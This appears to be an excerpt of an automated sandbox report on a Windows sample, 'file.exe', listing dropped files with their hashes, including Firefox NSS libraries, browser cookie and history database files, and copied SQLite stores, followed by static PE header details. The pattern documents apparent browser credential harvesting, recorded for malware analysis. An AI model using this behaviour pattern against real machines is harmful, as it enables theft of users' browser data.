SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\EHIIIJDAAAAAAKECBFBAEBKJJJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\FHIDAFHCBAKFCAAKFCFCFIIJKF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GCFHDAKECFIDGDGDBKJD

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\JJJEBGDAFHJEBGDGIJDH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\KJEHCGDBFCBAKECBKKEBKEBFCA

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.947857171986282
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	1'842'688 bytes
MD5:	beb729f85b42e8201b31a5b96c898f5f
SHA1:	b29a39f73636dea3780c5167bb87809ef8a82d6c
SHA256:	d71873f393259dc6b0998b4be7be61adbc24e0652716c2aaab2bbcb3d6cafabe
SHA512:	e85ed0f17a02b3bacac12430bbc1ada55ac782f2bcd9c541b3daf3a5ad221439be02931135dfbacf226037b34cd8891fd65890aac2ff8b6d17c22518dd635e1d
SSDEEP:	49152:+Gu8srD/zVSewEckzrFNsg92NkMGD42rB5U9hljLQC:huJzVSewTkPDgSMGD42rBqQC
TLSH:	878533C24E57452AC5C12130E8DBB21F7F72DE56609E4A9299293D3F00F7AC1F799E28
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0xa9b000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007FC4E84FDC9Ah
paddb mm3, qword ptr [ebx]
add byte ptr [eax], al
add byte ptr [eax], al
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], cl
add byte ptr [eax], al
add byte ptr [edx], ah
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+00000000h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop es
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax+00000000h], al
add byte ptr [eax], al

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x25d050	0x64	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
